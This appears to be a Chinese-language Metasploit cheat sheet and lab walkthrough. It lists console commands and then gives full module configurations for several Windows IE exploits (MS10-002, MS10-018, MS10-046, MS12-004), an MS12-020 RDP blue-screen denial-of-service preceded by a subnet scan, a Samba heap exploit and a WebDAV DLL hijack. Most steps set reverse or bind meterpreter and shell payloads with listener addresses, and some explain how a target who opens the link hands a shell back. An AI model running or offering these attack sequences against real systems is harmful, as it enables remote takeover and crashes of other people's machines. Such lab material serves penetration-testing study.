search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets 显示目标(os版本)
set TARGET target number(设置目标版本)
exploit(开始漏洞攻击)
sessions -l(列出会话)
sessions -i id(选择会话)
sessions -k id(结束会话)
Ctrl+z(把会话放到后台)
Ctrl+c(结束会话)
show auxiliary(显示辅助模块)
use auxiliary name (使用辅助模块)
set option name option(设置选项)
exploit(运行模块)
通过search scanner可以查看大量的扫描模块
测试漏洞——ms10_002 IE浏览器漏洞实例——browser
msf > use exploit/windows/browser/ms10_002_aurora (使用ms10_002_aurora模块)
msf exploit(ms10_002_aurora) > show options (查看选项)
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.1(url地址)
msf exploit(ms10_002_aurora) > set SRVPORT 80(url地址端口)
msf exploit(ms10_002_aurora) > set URIPATH /(网站根,默认就是/)
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp(反弹载荷)
msf exploit(ms10_002_aurora) > set LHOST 192.168.230.185(payload反弹地址,写本机)
msf exploit(ms10_002_aurora) > set LPORT 1211(监听端口)
msf exploit(ms10_002_aurora) > exploit (开始攻击)
msf exploit(ms10_002_aurora) > [*] Using URL: http://192.168.230.185:80/(生成url,此漏洞是激光漏洞,当我们把链接地址给目标访问,目标访问后就会反弹一个会话给本机)
msf exploit(ms10_002_aurora) > sessions -i(查看目标)
sessions -i 1(选择id为1的主机)
Meterpreter > shell(可以直接拿到主机的shell,然后可以执行系统命令)
测试漏洞——ms10_018 IE浏览器漏洞实例——browser
msf > use exploit/windows/browser/ms10_018_ie_behaviors(使用ms10_018_ie_behaviors模块)
msf exploit(ms10_018_ie_behaviors) > show options (查看选项)
msf exploit(ms10_018_ie_behaviors) > set SRVHOST 192.168.230.1(url地址)
msf exploit(ms10_018_ie_behaviors) > set SRVPORT 80(url端口)
msf exploit(ms10_018_ie_behaviors) > set URIPATH /(网站根)
msf exploit(ms10_018_ie_behaviors) > set payload windows/shell/reverse_tcp(直接反弹shell)
msf exploit(ms10_018_ie_behaviors) > set LHOST 192.168.230.185(监听地址,本机)
msf exploit(ms10_018_ie_behaviors) > set LPORT 5555(监听端口,本机)
msf exploit(ms10_018_ie_behaviors) > exploit (开始攻击,把链接地址给目标访问,目标访问后就会反弹一个会话给本机)
测试漏洞——ms10_046 IE浏览器漏洞实例——browser
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader (使用ms10_046漏洞)
msf exploit(ms10_046_shortcut_icon_dllloader) > show options (查看选项)
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.230.1(url地址)
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80(url端口)
msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /(网站根目录)
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp(反弹载荷)
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.230.186(回弹监听地址)
msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4444(回弹监听端口)
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit(开始攻击)
测试漏洞——ms12_004 IE浏览器漏洞实例——browser
msf > use exploit/windows/browser/ms12_004_midi (使用ms12_004漏洞)
msf exploit(ms12_004_midi) > set SRVHOST 192.168.230.176(url地址)
msf exploit(ms12_004_midi) > set SRVPORT 80(端口)
msf exploit(ms12_004_midi) > set URIPATH /(网站根)
msf exploit(ms12_004_midi) > set payload windows/meterpreter/reverse_tcp(反弹载荷)
msf exploit(ms12_004_midi) > set LHOST 192.168.230.186(反弹监听地址)
msf exploit(ms12_004_midi) > set LPORT 4545(反弹监听端口)
msf exploit(ms12_004_midi) > show targets (查看受影响的版本)
msf exploit(ms12_004_midi) > set target 3(选择版本id)
msf exploit(ms12_004_midi) > exploit(攻击)
测试漏洞——ms12_020 蓝屏攻击
msf > use auxiliary/scanner/rdp/ms12_020_check(先用ms12_020_check模块扫描是否有漏洞)
msf auxiliary(ms12_020_check) > show options(查看选项)
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.230.0/24(扫描目标网段)
msf auxiliary(ms12_020_check) > set THREADS 50(线程)
msf auxiliary(ms12_020_check) > exploit (扫描后有vulnerable就说明有危险项)
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids(利用ms12_020_maxchannelids漏洞)
msf auxiliary(ms12_020_maxchannelids) > show options(查看选项)
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.230.129(选择有漏洞的主机)
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389(端口,可以不写,默认是3389)
msf auxiliary(ms12_020_maxchannelids) > exploit(攻击后蓝屏)
Linux samba漏洞——
msf > use exploit/linux/samba/lsa_transnames_heap (利用lsa_transnames漏洞)
msf exploit(lsa_transnames_heap) > show options(查看选项)
msf exploit(lsa_transnames_heap) > set RHOST 192.168.230.157(目标地址)
msf exploit(lsa_transnames_heap) > set RPORT 445(目标端口)
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp(反弹荷载)
msf exploit(lsa_transnames_heap) > set LHOST 192.168.230.186(反弹监听地址)
msf exploit(lsa_transnames_heap) > set LPORT 3434(反弹监听端口)
msf exploit(lsa_transnames_heap) > exploit(攻击,由于这个漏洞影响范围只是3.0.20的,我的靶机版本较高,所以攻击失败)
dll注入攻击——
msf > use exploit/windows/browser/webdav_dll_hijacker(使用webdav_dll漏洞)
msf exploit(webdav_dll_hijacker) > show options (查看选项)
msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.230.176(url地址)
msf exploit(webdav_dll_hijacker) > set SRVPORT 80(url端口)
msf exploit(webdav_dll_hijacker) > set URIPATH /(网站根)
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/bind_tcp(反弹载荷)
msf exploit(webdav_dll_hijacker) > set LHOST 192.168.230.186(反弹监听地址)
msf exploit(webdav_dll_hijacker) > set LPORT 4444(反弹监听端口)
msf exploit(webdav_dll_hijacker) > exploit (攻击)